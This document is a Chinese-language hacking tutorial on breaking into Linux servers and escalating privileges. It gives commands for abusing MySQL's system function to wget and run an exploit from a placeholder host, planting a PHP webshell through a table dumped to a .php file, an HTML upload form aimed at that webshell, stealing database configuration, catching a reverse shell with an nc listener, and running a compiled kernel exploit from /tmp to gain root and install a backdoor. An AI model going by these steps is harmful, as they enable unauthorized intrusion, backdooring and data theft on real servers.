linux入侵提權(quán)(服務(wù)器提權(quán))方法
linux入侵提權(quán)(服務(wù)器提權(quán))方法
你還在為不知道linux入侵提權(quán)(服務(wù)器提權(quán))方法而煩惱么?接下來是小編為大家收集的linux入侵提權(quán)(服務(wù)器提權(quán))方法教程,希望能幫到大家。
linux入侵提權(quán)(服務(wù)器提權(quán))方法:
mysql 5.x里面引入了一個(gè)system函數(shù),這個(gè)函數(shù)可以執(zhí)行系統(tǒng)命令,當(dāng)mysql以root登陸的時(shí)候,就可以利用這個(gè)函數(shù)執(zhí)行命令,當(dāng)然是在權(quán)限許可的 范圍內(nèi)。
一般我們按照常規(guī)思路,搞到mysql的root密碼之后,我們都會(huì)連接上去,創(chuàng)建一個(gè)表,然后outfile,搞到一個(gè)webshell ,然后提權(quán)如斯這般。今天我們換一種方式。
按照上面的方法,我們需要知道web的絕對(duì)路徑,當(dāng)然這個(gè)很不好找,有些有sqlinjection的,可能報(bào)錯(cuò)會(huì)顯示出來,有的就不一定了。但是 按照我的的方法,沒有必要再去找web路徑了,直接執(zhí)行
mysql>system vi /etc/httpd/conf/httpd.conf;
直接這樣就可以找到web的路徑,當(dāng)然,我們的目的并不是找web路徑,放webshell進(jìn)去。我們是要來做其他的事情,好比,下載exp執(zhí)行, 搞到 root權(quán)限,然后裝后門
mysql>system wget http://www.xxx.com/xxxx ;
mysql>system chmod +x xxxx; mysql>system ./xxxx;
這樣mysql的root此時(shí)就成為system的root了,剩下的事情,假如開了ssh,就ssh連接上去,輸入mysql的用戶密碼,ok,搞 定。
Linux低權(quán)限提權(quán)
反彈試試 tmp里創(chuàng)建好文件,SHELL目錄傳馬,執(zhí)行,本地NC監(jiān)聽上線,WHOAMI一下,是WWWROOT權(quán)限
查看版本
可以CD到根目錄上級(jí)(/var/www/virtual/),再LS一下,全盤網(wǎng)站都出來了,目標(biāo)站也沒瞎起文件夾名,但是沒權(quán)限跳不進(jìn)去
試著TAR打包,沒權(quán)限,試著單獨(dú)打包目標(biāo)站目錄文件,可以,但是根目錄CONN.CONFIG被限制當(dāng)前目標(biāo)站可讀權(quán)限。
嘗試CP目標(biāo)站include目錄,竟然可以復(fù)制過來,但是不可寫復(fù)制不過去,找到了數(shù)據(jù)庫配置信息,再另外服務(wù)器上。
先把數(shù)據(jù)庫用phpspyshell備份過來:
查看到一些配置信息跟賬號(hào),但是沒有后臺(tái)路徑等敏感信息
掃描工具掃不到目標(biāo)網(wǎng)站文件夾,估計(jì)修改過了
試著提權(quán)CMDSHELL為USER或者ROOT,沒有直接去看Apache的配置設(shè)置,試著WGET幾個(gè)EXP,但是都沒用,估計(jì)打過補(bǔ)丁
CP雖然可以,但是不知道具體的信息
既然WEB沒權(quán)限,就試著MYSQL看看有沒有權(quán)限吧
直接
CREATE TABLE hackdn (spider BLOB);創(chuàng)建表hackdn
插一句話
保存
然后備份成目標(biāo)路徑1.php文件。發(fā)現(xiàn)連接不了。
CP過來一看,被反譯符分隔了,
不加 ‘ 的話,就插入
再備份為PHP后,本地保存以下代碼為
代碼如下 | 復(fù)制代碼 |
1.HTML <form ENCTYPE=”multipart/form-data” ACTION=”http://www.webshell.cc/mysql_bak/1.php” METHOD=”POST”> <input NAME=”MyFile” TYPE=”file”> <input VALUE=” 提交 ” TYPE=”submit”> </form> |
簡單的linux提權(quán)
拿到shell了,準(zhǔn)備提權(quán).先看下linux內(nèi)核
uname -a
2.6.18-194.11.3.el5 內(nèi)核 2010的,這個(gè)好CentOS release 5.5好提
然后百度或者其它路徑找EXP,2.6.18-194這個(gè)內(nèi)核我已經(jīng)收藏過.上傳到/tmp,為什么要傳到這個(gè)目錄呢?
因?yàn)閠mp目錄可寫可執(zhí)行一般,繼續(xù)ing.
找個(gè)外網(wǎng)IP 監(jiān)聽12666,當(dāng)然12666也可以改。我這里用NC監(jiān)聽nc -l -n -v -p 12666
然后再點(diǎn)你shell
連接成功就出現(xiàn)下面的內(nèi)容
然后我們進(jìn)到/tmp目錄
cd /tmp 進(jìn)入到tmp目錄了,看下我們之前上傳的2.6.18-194
我這里有權(quán)限r(nóng)wx,可讀可寫可執(zhí)行.如果沒有權(quán)限chmod -R 777 文件名
我這里的exp已編譯過了,直接執(zhí)行溢出就ok了 ./2.6.18-194 要是你的exp沒有編譯gcc -o /tmp/文件名 /tmp/文件名.c ,自己編譯下就行了
成功了。。 其實(shí)linux提權(quán)還是很簡單,關(guān)鍵看有沒exp... 完了 完了 !!!!!